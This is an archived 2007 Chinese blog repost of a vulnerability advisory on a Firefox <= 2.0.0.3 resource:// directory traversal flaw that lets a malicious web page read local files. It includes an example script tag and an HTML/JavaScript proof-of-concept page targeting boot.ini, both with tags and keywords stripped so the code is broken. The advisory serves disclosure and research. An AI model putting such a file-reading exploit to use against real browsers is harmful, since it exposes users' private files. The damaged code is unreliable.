§‖ Date ::..
<<
<
2007
-
6
>
>>
日
一
二
三
四
五
六
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
§‖ BLog Info ::..
页面载入中,请稍候...
§‖ New BLog ::..
页面载入中,请稍候...
§‖
Comment
::..
页面载入中,请稍候...
§‖
Message
::..
页面载入中,请稍候...
§‖
User Login
::..
页面载入中,请稍候...
§‖
Search
::..
页面载入中,请稍候...
§‖
Links
::..
页面载入中,请稍候...
Mozilla Firefox 远程目录遍历漏洞
Mozilla Firefox <= 2.0.0.3 resource://远程目录遍历漏洞
影响系统:
Mozilla Firefox <= 2.0.0.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 24191
Mozilla Firefox是一款流行的开源WEB浏览器。
Mozilla Firefox在处理服务器返回的“resource://”URL资源访问时存在漏洞,恶意网页可能利用此漏洞访问客户端系统上的文件。
Firefox中的resource:// URL协议处理器没有正确地验证某些用户输入,允许攻击者使用..%5C而不是..\绕过安全限制,将文件内容暴露为或CSS标签的可读属性,导致读取本地系统的任意文件。
例如,假设系统中的C:\resource.txt文件包含有:
secretinfo = “steal me”
则攻击者可以通过包含有以下内容的脚本将本地文件的内容暴露于站点:
< src="http://www.hblog.net/”resource://gre/..%5C..%5Cresource.txt"”></>
<*来源:shutdown (shutdown@flashmail.com)
链接:
https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=367428
http://larholm.com/2007/05/25/firefox-0day-local-file-reading/
http://ha.ckers.org/blog/20070516/read-firefox-settings-poc/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<title>resource:// directory traversal testcase</title>
< type="text/java"><!--
check(path) {
var e = createElement("");
e.src = path;
= (text, path, line) {
e.parentNode.removeChild(e);
var eresult = getElementById("result");
var textnode = createTextNode(path + ": " + text + "\n");
eresult.insertBefore(textnode, eresult.firstChild);
};
body.appendChild(e);
}
//--></>
</head>
<body>
<h1>resource:// directory traversal testcase</h1>
<no><p>this testcase requires Java to run.</p></no>
<form>
URL: <input name="path" type="text" size="80"
="resource://gre/..%5c..%5c..%5c..%5cboot.ini">
<input type="button" ="check" ="check(this.form.path.);">
</form>
<p><pre id="result"></pre></p>
</body>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
雄鹰 by 2007-6-7 13:45:00
阅读全文
|
回复(0)
|
引用通告
|
编辑
上一篇:
Google PageRank工具条 破解全过程(附c#源代码)
下一篇:
U盘AutoRun病毒清除代码
发表评论:
昵称:
密码:
(游客无须输入密码)
主页:
标题:
页面载入中,请稍候...
页面载入中,请稍候...
雄鹰 by 2007-6-7 13:45:00